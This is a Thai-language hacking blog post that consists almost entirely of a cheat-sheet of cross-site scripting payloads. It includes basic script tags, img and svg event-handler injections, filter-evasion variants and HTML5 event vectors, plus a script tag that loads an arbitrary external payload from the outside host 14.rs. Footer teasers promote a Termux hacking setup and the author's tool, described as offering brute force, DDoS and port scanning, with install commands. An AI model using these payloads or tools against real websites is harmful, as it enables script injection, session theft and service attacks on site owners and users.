XSS Payload for Hacking ครั้งที่ 1

XSS Payload for Hacking ครั้งที่ 1

XSS in HTML/Applications

XSS Basic

Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>


Svg payload
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)



XSS for HTML5




<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>


XSS using script tag (external payload)


<script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)

ความคิดเห็น

แสดงความคิดเห็น

โพสต์ยอดนิยมจากบล็อกนี้

วิธีใช้ Termux สำหรับการแฮก

รูปภาพ
Termux Terminal Termux คือแอพพิเคชั่น ที่เอาไว้เปิด Linux Terminal แอพนี้สามารถใช้งานได้โดยไม่ต้องรูท สามารถใช้งานได้บน Android 5.0 ขึ้นไป Termux สามารถดาวโหลดได้บน playstore Setup แอพ Termux Terminal หลังจากได้โหลดแอพ Termux มาเรียบร้อย มันจะมาแค่ตัวแอพ แต่ไม่มี Tools สำหรับแฮกเพราะฉนั้นจึงจำเป็นที่จะต้อง Setup และ Install แพ็คเก็ตที่จำเป็น คำสั่ง Setup และ Install แพ็คเก็ต $apt-get upgrade $termux-setup-storage $apt-get install git $apt-get install wget $pip install wordlist $apt-get install python python2 $apt-get install hydra $apt-get dist-upgrade คำสั่งลง Tools Scrip $git clone (ตามด้วยลิ้งค์ GitHub) $wget (ตามด้วยลิ้งค์ GitHub)
อ่านเพิ่มเติม

วิธีติดตั้ง HPAS1369

รูปภาพ
HPAS1369 คือ Tools ที่ถูกสร้างเพื่อเอาไว้ทดสอบระบบ ถูกสร้างขึ้นโดย Zero Hacker (ผมเอง) ซึ้งสคริปนี้มีฟรีเจอร์อยู่ 4 อย่างคือ -Brute Force หารหัส -DDos Attack ยิงเว็บ ยิงเน็ต -NMap PortScanner แสกนพอร์ต NMap -Install Tools Hacking ติดตั้ง Tools อื่น คุณสามารถนำไปแฮกและทดสอบระบบได้ Tools นี้ไม่จำเป็นต้องรูท วิธีติดตั้ง $apt-get upgrade $apt-get install git python python2 $git clone https://github.com/DedSecCyber/HPAS1369 $cd HPAS1369 $sh install.sh มันก็จะติดตั้งโดยอัตโนมัท วิธีใช้ $python2 HPAS1369. py
อ่านเพิ่มเติม